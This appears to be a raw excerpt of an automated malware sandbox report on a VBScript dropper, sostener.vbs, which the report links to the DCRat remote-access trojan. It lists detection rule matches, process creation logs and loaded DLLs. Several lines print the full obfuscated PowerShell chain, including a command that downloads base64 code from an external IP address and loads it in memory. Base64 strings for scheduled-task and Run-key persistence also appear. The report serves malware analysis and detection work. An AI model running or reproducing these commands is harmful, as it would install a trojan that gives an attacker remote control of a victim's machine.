            Source: 3.2.powershell.exe.18504e7a558.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
            Source: 3.2.powershell.exe.18504e7a558.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
            Source: 3.2.powershell.exe.18504e7a558.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing the string DcRatBy Author: ditekSHen
            Source: 3.2.powershell.exe.18506078440.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects known downloader agent Author: ditekSHen
            Source: 3.2.powershell.exe.18504da3b80.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects known downloader agent Author: ditekSHen
            Source: 00000003.00000002.1707124383.000001851CFD0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects known downloader agent Author: ditekSHen
            Source: 00000004.00000002.2957234369.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
            Source: 00000004.00000002.2958714804.000000000148B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
            Source: 00000003.00000002.1690160988.0000018504E7A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
            Source: 00000004.00000002.2959693552.0000000003181000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
            Source: 00000004.00000002.2958104515.0000000001438000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
            Source: Process Memory Space: powershell.exe PID: 3848, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: Process Memory Space: powershell.exe PID: 4312, type: MEMORYSTRMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
            Source: Process Memory Space: powershell.exe PID: 4312, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: Process Memory Space: RegSvcs.exe PID: 6884, type: MEMORYSTRMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
            Windows Scripting host queries suspicious COM object (likely to drop second stage)
            Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
            Wscript starts Powershell (via cmd or directly)
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = 'J Bx Gs dgB3 HI I 9 C Jw w Cc Ow k Gk YQBx HU Yw g D0 I n CU c B6 EE YwBP Gc SQBu E0 cg l Cc OwBb EI eQB0 GU WwBd F0 I k Hk dwBq GQ a g D0 I Bb HM eQBz HQ ZQBt C4 QwBv G4 dgBl HI d Bd Do OgBG HI bwBt EI YQBz GU Ng 0 FM d By Gk bgBn Cg I o E4 ZQB3 C0 TwBi Go ZQBj HQ I BO GU d u Fc ZQBi EM b Bp GU bgB0 Ck LgBE G8 dwBu Gw bwBh GQ UwB0 HI aQBu Gc K n Gg d B0 H Og v C8 OQ x C4 Mg w DI Lg y DM Mw u DE Ng 5 C8 V Bh Gs LwBS GU Zw v E0 YQBy Ho LwBE FI Rw v FI V BD C8 Rg z GQ b Bs C4 d B4 HQ Jw p Ck OwBb HM eQBz HQ ZQBt C4 QQBw H R Bv G0 YQBp G4 XQ 6 Do QwB1 HI cgBl G4 d BE G8 bQBh Gk bg u Ew bwBh GQ K k Hk dwBq GQ a p C4 RwBl HQ V B5 H ZQ o Cc QwBs GE cwBz Ew aQBi HI YQBy Hk MQ u EM b Bh HM cw x Cc KQ u Ec ZQB0 E0 ZQB0 Gg bwBk Cg JwBa Hg SwBI Ec Jw p C4 SQBu HY bwBr GU K k G4 dQBs Gw L g Fs bwBi Go ZQBj HQ WwBd F0 I o Cc d B4 HQ Lg x Eo R v FM VgBO EU LwB6 HI YQBN C8 ZwBl FI LwBr GE V v Dk Ng x C4 Mw z DI Lg y D Mg u DE OQ v C8 OgBw HQ d Bo Cc I s C J Bp GE cQB1 GM I s C JwBS Gc dgB1 Ec Jw s C J Bx Gs dgB3 HI L g Cc MQ n Cw I n FI bwBk GE Jw g Ck KQ 7 ==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace(' ','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\Desktop\sostener.vbs');powershell $KByHL;
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = 'J Bx Gs dgB3 HI I 9 C Jw w Cc Ow k Gk YQBx HU Yw g D0 I n CU c B6 EE YwBP Gc SQBu E0 cg l Cc OwBb EI eQB0 GU WwBd F0 I k Hk dwBq GQ a g D0 I Bb HM eQBz HQ ZQBt C4 QwBv G4 dgBl HI d Bd Do OgBG HI bwBt EI YQBz GU Ng 0 FM d By Gk bgBn Cg I o E4 ZQB3 C0 TwBi Go ZQBj HQ I BO GU d u Fc ZQBi EM b Bp GU bgB0 Ck LgBE G8 dwBu Gw bwBh GQ UwB0 HI aQBu Gc K n Gg d B0 H Og v C8 OQ x C4 Mg w DI Lg y DM Mw u DE Ng 5 C8 V Bh Gs LwBS GU Zw v E0 YQBy Ho LwBE FI Rw v FI V BD C8 Rg z GQ b Bs C4 d B4 HQ Jw p Ck OwBb HM eQBz HQ ZQBt C4 QQBw H R Bv G0 YQBp G4 XQ 6 Do QwB1 HI cgBl G4 d BE G8 bQBh Gk bg u Ew bwBh GQ K k Hk dwBq GQ a p C4 RwBl HQ V B5 H ZQ o Cc QwBs GE cwBz Ew aQBi HI YQBy Hk MQ u EM b Bh HM cw x Cc KQ u Ec ZQB0 E0 ZQB0 Gg bwBk Cg JwBa Hg SwBI Ec Jw p C4 SQBu HY bwBr GU K k G4 dQBs Gw L g Fs bwBi Go ZQBj HQ WwBd F0 I o Cc d B4 HQ Lg x Eo R v FM VgBO EU LwB6 HI YQBN C8 ZwBl FI LwBr GE V v Dk Ng x C4 Mw z DI Lg y D Mg u DE OQ v C8 OgBw HQ d Bo Cc I s C J Bp GE cQB1 GM I s C JwBS Gc dgB1 Ec Jw s C J Bx Gs dgB3 HI L g Cc MQ n Cw I n FI bwBk GE Jw g Ck KQ 7 ==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace(' ','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\Desktop\sostener.vbs');powershell $KByHL;Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013E65D04_2_013E65D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013E6EA04_2_013E6EA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013E62884_2_013E6288
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013EB5904_2_013EB590
            Source: sostener.vbsInitial sample: Strings found which are bigger than 50
            Source: dump.pcap, type: PCAPMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
            Source: 3.2.powershell.exe.1851cfd0000.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLAgent09 author = ditekSHen, description = Detects known downloader agent
            Source: 4.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
            Source: 4.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
            Source: 4.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
            Source: 4.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
            Source: 3.2.powershell.exe.18504e7a558.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
            Source: 3.2.powershell.exe.18504e7a558.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
            Source: 3.2.powershell.exe.18504e7a558.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
            Source: 3.2.powershell.exe.18504e7a558.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
            Source: 3.2.powershell.exe.18504e7a558.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
            Source: 3.2.powershell.exe.18504e7a558.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
            Source: 3.2.powershell.exe.18504e7a558.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
            Source: 3.2.powershell.exe.18504e7a558.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
            Source: 3.2.powershell.exe.18506078440.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLAgent09 author = ditekSHen, description = Detects known downloader agent
            Source: 3.2.powershell.exe.18504da3b80.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLAgent09 author = ditekSHen, description = Detects known downloader agent
            Source: 00000003.00000002.1707124383.000001851CFD0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_DLAgent09 author = ditekSHen, description = Detects known downloader agent
            Source: 00000004.00000002.2957234369.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
            Source: 00000004.00000002.2958714804.000000000148B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
            Source: 00000003.00000002.1690160988.0000018504E7A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
            Source: 00000004.00000002.2959693552.0000000003181000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
            Source: 00000004.00000002.2958104515.0000000001438000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
            Source: Process Memory Space: powershell.exe PID: 3848, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: Process Memory Space: powershell.exe PID: 4312, type: MEMORYSTRMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
            Source: Process Memory Space: powershell.exe PID: 4312, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: Process Memory Space: RegSvcs.exe PID: 6884, type: MEMORYSTRMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
            Source: 3.2.powershell.exe.18504e7a558.0.raw.unpack, Settings.csBase64 encoded string: 'm1SVmzq41bUtAgiVmChGud35fX/aUNtosr8PYStFYOAnPrN+XR+IkjYiqiUpGtB3iVUC/dwECsCyuNfy8XiQAX4f4BhMF5n5tkjlBy9/rl0=', 'iL4iV3kbq9Wc0eHBghluHFSJGvtmXcYzxD3f8ndQ9uTnqLo5XWL/Ob2NJszbQS9lzFt1jtk75UQxLxfydXIBbg==', 'NiwdLwCGJgE9T7NLnBzBzUZfLUnyV6dx/ze20L7vWNWQ5mgVR+i6SjVmK91d/XSyq8PTQbbEpEgD0Xcz2y73QaWV99k2Y1Pt+k+9qXbk4PVBd+RqCLBna/DVB9TyjaEidnq1LUCkN2zxPmQaYaEvCgmRmdNoBfuk36jL1sYox30ftHy5iwhDgfI8fL3PpwAo3sNeka/8mx1KcBGR7oR1xVUtiKEzj2D/1D0w24ko+BPZT7PtOwOk/zDAz2BhLe2bfHbQfgQPn2k2xohtMzwXk2d1LJokIAhKOsfQJ3IsiLkxzOAXHL+Zz7hFHWBUaTa74PzCj7UfJlo9t7tL31QcU0Ut5s1Z7GDAxwuCsQ+4EzdbnwOAr3L13MzLh/+6y0AmG8WY9d2v7FLTX49s6HUqXpfCJRrXXHSXolFZyNXJqU03WuCVMP3GnWK91ZRKysddcBJYYLw7JcGX0jSLUaFDCOShBrZcR1uNqWGg3y5kzcjvkNKmSLFHUt2yApjlgOV3LvWJ10fwH+T7AP8aFNYnyqz/JKxqqIJI29IaIpV1p7PytVd8DrnVQxsy2MIw4VmUjU68usaUG1/Sq003yCFYdKuWDoYb9XReUAYDxzoG4KEcVXpQiIgn3zmO+fNWbIWUMeR50jVsNO8+HO30YezLEMATPkCTImVSQAeDK4Wm6pW16ivu30DMoIRVu+JE1Oxe1HkxdJZaT1fik4dKGO58CYSSeiUTyrUbI6kBZQnDVnBzkNu2Al6SwE73fajFQLal+oSGQ2T9MhdGgEGVOYUGWoI+0y9lX9fJGbdja0QpZ8IOom55sJJp2mAYPqxtpzULHJeDbSQto9MeA7meSBtk7rEJECdJHtIqe5Dd+7fWE4v68VSq+rkJr4ZzP6YIZ+Js0KXt1TWnQ22NcCZ3aooBNp7Lm/ZW706KP6Wj1Zn74tOEq78XWGXGPsZ2JvxQoCk45CTkBqTr58qnivpoprK+t+TL4LBqtyBV+iHUkivD4I+OfR1MRJm/SSoJKHHT0YgDwv+d/r9ZqNKvRP1sv456gPAESQDOHbKMPTM9qe+3KzFdhYSV6gRZfTnAPBjEnfSl', 'UB9UzwA9tGakGgTcozLufAUFQxQCuoOi+9ktVsBWG9zFIaU239Gos24AjhaHGQraIeSRRMO3GubTGWn/PCwrNYDzeS4gR3UOWKRrfG9785AWj+/K1SLSEQEyKczGXXNvpC+Yxv5Iymd50ZYpBzwc9x1ME3yP5inYKo5PAUjVoKBlbQlnkfav1AqoOrhH7ohpYYwiXO65nsLpVF8JreGq/VlAHr1JQ9fopC032bYNkBljQf6l83C+UrfxPGpwixgV84GrrDa4efbY4mhD/tCoGnoWO4dgjbGj+FO0qjoyq3E=', 'MIlzi1B7PthTHEHMqprZFE7qh2CwotWNt1bDN2lDdtoVWtDWHS/TzpIcw4Wbme2XtTl/hfh6Cu0vUdf8k+aIhQ==', 'K37OLhwW8YSNgPJaT0/aIK6XT8xXXyJ8hP5zAzYNpppfpBxw4RuVM3WlDbJs4ti69CCz6JpT8wlSjr3femWfpw==', 'j59e0As5uh5mS607NeJD0+mZaKrTbSvccTOP1iThRoCdeFwO1hE/wQ4vuh1aDrUI68wwcvmfYRuWnrMNT8SRhg=='
            Source: 3.2.powershell.exe.18504e7a558.0.raw.unpack, NormalStartup.csBase64 encoded string: 'L2Mgc2NodGFza3MgL2NyZWF0ZSAvZiAvc2Mgb25sb2dvbiAvcmwgaGlnaGVzdCAvdG4g', 'U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA=='
            Source: classification engineClassification label: mal100.troj.expl.evad.winVBS@8/5@7/2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1880:120:WilError_03
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: \Sessions\1\BaseNamedObjects\DcRatMutex_qwqdanchun
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yxbjuoro.p31.ps1Jump to behavior
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\sostener.vbs"
            Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\sostener.vbs"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = 'J Bx Gs dgB3 HI I 9 C Jw w Cc Ow k Gk YQBx HU Yw g D0 I n CU c B6 EE YwBP Gc SQBu E0 cg l Cc OwBb EI eQB0 GU WwBd F0 I k Hk dwBq GQ a g D0 I Bb HM eQBz HQ ZQBt C4 QwBv G4 dgBl HI d Bd Do OgBG HI bwBt EI YQBz GU Ng 0 FM d By Gk bgBn Cg I o E4 ZQB3 C0 TwBi Go ZQBj HQ I BO GU d u Fc ZQBi EM b Bp GU bgB0 Ck LgBE G8 dwBu Gw bwBh GQ UwB0 HI aQBu Gc K n Gg d B0 H Og v C8 OQ x C4 Mg w DI Lg y DM Mw u DE Ng 5 C8 V Bh Gs LwBS GU Zw v E0 YQBy Ho LwBE FI Rw v FI V BD C8 Rg z GQ b Bs C4 d B4 HQ Jw p Ck OwBb HM eQBz HQ ZQBt C4 QQBw H R Bv G0 YQBp G4 XQ 6 Do QwB1 HI cgBl G4 d BE G8 bQBh Gk bg u Ew bwBh GQ K k Hk dwBq GQ a p C4 RwBl HQ V B5 H ZQ o Cc QwBs GE cwBz Ew aQBi HI YQBy Hk MQ u EM b Bh HM cw x Cc KQ u Ec ZQB0 E0 ZQB0 Gg bwBk Cg JwBa Hg SwBI Ec Jw p C4 SQBu HY bwBr GU K k G4 dQBs Gw L g Fs bwBi Go ZQBj HQ WwBd F0 I o Cc d B4 HQ Lg x Eo R v FM VgBO EU LwB6 HI YQBN C8 ZwBl FI LwBr GE V v Dk Ng x C4 Mw z DI Lg y D Mg u DE OQ v C8 OgBw HQ d Bo Cc I s C J Bp GE cQB1 GM I s C JwBS Gc dgB1 Ec Jw s C J Bx Gs dgB3 HI L g Cc MQ n Cw I n FI bwBk GE Jw g Ck KQ 7 ==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace(' ','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\Desktop\sostener.vbs');powershell $KByHL;
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$qkvwr = '0';$iaquc = 'C:\Users\user\Desktop\sostener.vbs';[Byte[]] $ywjdh = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('http://91.202.233.169/Tak/Reg/Marz/DRG/RTC/F3dll.txt'));[system.AppDomain]::CurrentDomain.Load($ywjdh).GetType('ClassLibrary1.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('txt.1JD/SVNE/zraM/geR/kaT/961.332.202.19//:ptth' , $iaquc , 'RgvuG', $qkvwr, '1', 'Roda' ));"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = 'J Bx Gs dgB3 HI I 9 C Jw w Cc Ow k Gk YQBx HU Yw g D0 I n CU c B6 EE YwBP Gc SQBu E0 cg l Cc OwBb EI eQB0 GU WwBd F0 I k Hk dwBq GQ a g D0 I Bb HM eQBz HQ ZQBt C4 QwBv G4 dgBl HI d Bd Do OgBG HI bwBt EI YQBz GU Ng 0 FM d By Gk bgBn Cg I o E4 ZQB3 C0 TwBi Go ZQBj HQ I BO GU d u Fc ZQBi EM b Bp GU bgB0 Ck LgBE G8 dwBu Gw bwBh GQ UwB0 HI aQBu Gc K n Gg d B0 H Og v C8 OQ x C4 Mg w DI Lg y DM Mw u DE Ng 5 C8 V Bh Gs LwBS GU Zw v E0 YQBy Ho LwBE FI Rw v FI V BD C8 Rg z GQ b Bs C4 d B4 HQ Jw p Ck OwBb HM eQBz HQ ZQBt C4 QQBw H R Bv G0 YQBp G4 XQ 6 Do QwB1 HI cgBl G4 d BE G8 bQBh Gk bg u Ew bwBh GQ K k Hk dwBq GQ a p C4 RwBl HQ V B5 H ZQ o Cc QwBs GE cwBz Ew aQBi HI YQBy Hk MQ u EM b Bh HM cw x Cc KQ u Ec ZQB0 E0 ZQB0 Gg bwBk Cg JwBa Hg SwBI Ec Jw p C4 SQBu HY bwBr GU K k G4 dQBs Gw L g Fs bwBi Go ZQBj HQ WwBd F0 I o Cc d B4 HQ Lg x Eo R v FM VgBO EU LwB6 HI YQBN C8 ZwBl FI LwBr GE V v Dk Ng x C4 Mw z DI Lg y D Mg u DE OQ v C8 OgBw HQ d Bo Cc I s C J Bp GE cQB1 GM I s C JwBS Gc dgB1 Ec Jw s C J Bx Gs dgB3 HI L g Cc MQ n Cw I n FI bwBk GE Jw g Ck KQ 7 ==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace(' ','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\Desktop\sostener.vbs');powershell $KByHL;Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$qkvwr = '0';$iaquc = 'C:\Users\user\Desktop\sostener.vbs';[Byte[]] $ywjdh = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('http://91.202.233.169/Tak/Reg/Marz/DRG/RTC/F3dll.txt'));[system.AppDomain]::CurrentDomain.Load($ywjdh).GetType('ClassLibrary1.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('txt.1JD/SVNE/zraM/geR/kaT/961.332.202.19//:ptth' , $iaquc , 'RgvuG', $qkvwr, '1', 'Roda' ));"Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
